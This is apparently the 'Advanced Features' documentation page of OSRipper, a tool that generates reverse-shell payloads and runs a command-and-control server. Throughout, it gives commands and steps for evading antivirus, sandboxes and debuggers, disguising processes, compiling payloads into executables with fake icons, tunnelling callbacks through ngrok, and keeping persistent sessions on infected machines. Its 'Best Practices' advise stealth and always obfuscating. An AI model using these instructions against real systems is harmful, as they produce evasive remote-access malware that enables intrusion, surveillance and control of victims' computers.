Advanced Features

Advanced Features

This guide covers advanced features and techniques for maximizing OSRipper's capabilities.

Table of Contents

• Obfuscation
• Evasion Techniques
• Compilation
• Ngrok Integration
• Certificate Pinning
• Session Persistence
• Custom Payloads

---

Obfuscation

OSRipper provides multiple levels of obfuscation to evade detection.

Standard Obfuscation

Multi-layer code encoding with randomized variables.

Features:

• Variable name randomization
• Code structure obfuscation
• Base64 encoding layers
• String encryption

Usage:

osripper-cli reverse -H IP -p PORT --obfuscate

Enhanced Obfuscation

Advanced obfuscation with additional evasion techniques.

Features:

• All standard obfuscation features
• Anti-debugging techniques
• VM detection evasion
• Junk code injection
• Advanced code transformations

Usage:

osripper-cli reverse -H IP -p PORT --obfuscate --enhanced

Note: Enhanced obfuscation requires --obfuscate flag.

How It Works

1. Variable Randomization - Random variable names generated
2. Code Encoding - Multiple encoding layers applied
3. Structure Obfuscation - Code structure modified
4. String Encryption - Strings encrypted/encoded
5. Junk Code - Dummy code inserted (enhanced only)
6. Anti-Debug - Debug detection code added (enhanced only)

Obfuscation Levels

Level	Features	Detection Rate
None	No obfuscation	High
Standard	Basic encoding	Medium
Enhanced	Full evasion	Low

---

Evasion Techniques

OSRipper implements multiple evasion techniques to avoid detection.

VM Detection

Detects virtual machines and sandboxes to avoid analysis.

Techniques:

• CPU core count checking
• MAC address validation
• Process name detection
• Registry checks (Windows)
• System information analysis

Bypass (Testing):

osripper-cli doh -d domain.com --testing

Anti-Debugging

Prevents debugging and analysis.

Techniques:

• Debugger detection
• Process monitoring detection
• Timing checks
• Exception handling

Process Masquerading

Disguises payload process as legitimate system process.

Methods:

• Process name spoofing
• Parent process manipulation
• Command-line argument masking

Stealth Delays

Random delays at startup to evade immediate execution monitoring.

Usage:

osripper-cli reverse -H IP -p PORT --delay

Delay Range: 5-15 seconds (configurable)

Signature Randomization

Every generated payload is unique:

• Random variable names
• Random code structure
• Unique encoding keys
• Variable obfuscation

---

Compilation

Compile Python payloads to standalone binaries for easier deployment.

Nuitka Compilation

OSRipper uses Nuitka for binary compilation.

Features:

• Standalone executables
• No Python interpreter required
• Cross-platform support
• Custom icons support

Usage:

osripper-cli reverse -H IP -p PORT --compile

Custom Icons

Add custom icons to compiled binaries.

Windows:

osripper-cli reverse -H IP -p PORT --compile --icon app.ico

macOS:

osripper-cli reverse -H IP -p PORT --compile --icon app.icns

Icon Requirements:

• Windows: .ico format
• macOS: .icns format
• Linux: Not supported

Compilation Options

Platform-Specific:

• Windows: .exe executable
• macOS: .app bundle
• Linux: Binary executable

Output Location:

• Compiled binaries: results/payload.bin
• Obfuscated source: results/payload_or.py

Compilation Process

1. Source Preparation - Obfuscate if enabled
2. Nuitka Compilation - Compile to binary
3. Icon Injection - Add custom icon (if provided)
4. Output - Save to results directory

---

Ngrok Integration

Use ngrok for dynamic IP addresses and port forwarding.

Setup

1. Install Ngrok:

   # Download from ngrok.com
   # Extract and add to PATH

2. Get API Key:

   • Sign up at dashboard.ngrok.com
   • Get authtoken

3. Configure:

   ngrok config add-authtoken YOUR_AUTH_TOKEN

Usage

Generate Payload:

osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

Start Tunnel:

# In another terminal
ngrok tcp 4444

Get Tunnel Info:

• OSRipper automatically detects ngrok tunnel
• Or manually enter tunnel address when prompted

Benefits

• Dynamic IP addresses
• No port forwarding required
• Easy testing
• Quick deployment

---

Certificate Pinning

Secure HTTPS C2 with certificate pinning for authentication.

How It Works

1. Certificate Generation - Server generates or uses certificate
2. Fingerprint Extraction - SHA256 fingerprint extracted
3. Payload Configuration - Fingerprint embedded in payload
4. Validation - Agent validates certificate on connection

Setup

1. Start C2 Server with HTTPS:

python -m osripper.c2.server example.com --https

2. Get Certificate Fingerprint:

curl http://localhost:5000/api/cert-fingerprint

3. Generate Payload:

• Via Web UI: Fingerprint auto-fills
• Via CLI: Manually specify fingerprint

Benefits

• MITM Protection - Prevents man-in-the-middle attacks
• Authentication - Ensures connection to legitimate server
• Security - Encrypted communication channel

Custom Certificates

Generate Certificate:

openssl req -x509 -newkey rsa:4096 \
  -keyout server.key \
  -out server.crt \
  -days 365 \
  -nodes

Use Custom Certificate:

python -m osripper.c2.server example.com \
  --https \
  --cert server.crt \
  --key server.key

---

Session Persistence

Maintain C2 connections across restarts and network changes.

How It Works

1. Session ID Generation - Unique ID created per agent
2. Local Storage - Session ID stored locally on agent
3. Reconnection - Agent uses same session ID on restart
4. Server Recognition - Server recognizes returning session

Session Storage

Agent Side:

• Session ID stored in local file
• Persists across reboots
• Survives process termination

Server Side:

• Session stored in database
• Command history maintained
• System information cached

Benefits

• Persistence - Maintains connection across restarts
• History - Command history preserved
• Tracking - Track same system over time

---

Custom Payloads

Create custom payloads using the custom code crypter.

Requirements

• Valid Python 3.6+ code
• Self-contained (or include dependencies)
• No hardcoded paths
• Tested before obfuscation

Usage

osripper-cli custom --script mypayload.py \
  --obfuscate \
  --enhanced \
  --compile \
  --output custom_payload

Best Practices

1. Test First - Test script before obfuscation
2. Minimize Dependencies - Reduce external dependencies
3. Error Handling - Include proper error handling
4. Stealth - Avoid suspicious behavior
5. Obfuscation - Always use obfuscation

Example Custom Payload

#!/usr/bin/env python3
import os
import subprocess

def main():
    # Your custom code here
    result = subprocess.run(['whoami'], capture_output=True)
    print(result.stdout.decode())

if __name__ == "__main__":
    main()

Obfuscate:

osripper-cli custom --script custom.py --obfuscate --enhanced --compile

---

Performance Optimization

Payload Size

Reduce Size:

• Minimize dependencies
• Remove unnecessary code
• Use obfuscation efficiently

Compilation Speed

Faster Compilation:

• Use standard obfuscation (faster than enhanced)
• Skip compilation for testing
• Use parallel compilation (Nuitka feature)

Runtime Performance

Optimize Execution:

• Minimize startup code
• Reduce initial delays
• Optimize polling intervals

---

Advanced Configuration

Environment Variables

# Set custom paths
export OSRIPPER_RESULTS_DIR=/custom/path
export OSRIPPER_TMP_DIR=/custom/tmp

Configuration Files

Create custom configuration (future feature):

obfuscation:
  enhanced: true
  layers: 5

compilation:
  compiler: nuitka
  optimize: true

stealth:
  delay: true
  vm_detection: true

---

Troubleshooting Advanced Features

Obfuscation Issues

• Large File Size: Reduce obfuscation layers
• Syntax Errors: Test source code first
• Import Errors: Ensure dependencies included

Compilation Issues

• Nuitka Not Found: Install Nuitka (pip3 install nuitka)
• Compilation Fails: Check system dependencies
• Large Binary: Use optimization flags

Ngrok Issues

• Tunnel Not Detected: Manually enter tunnel address
• Connection Fails: Verify ngrok is running
• Port Conflicts: Use different port

---

For more information, see the Usage Guide and Troubleshooting pages.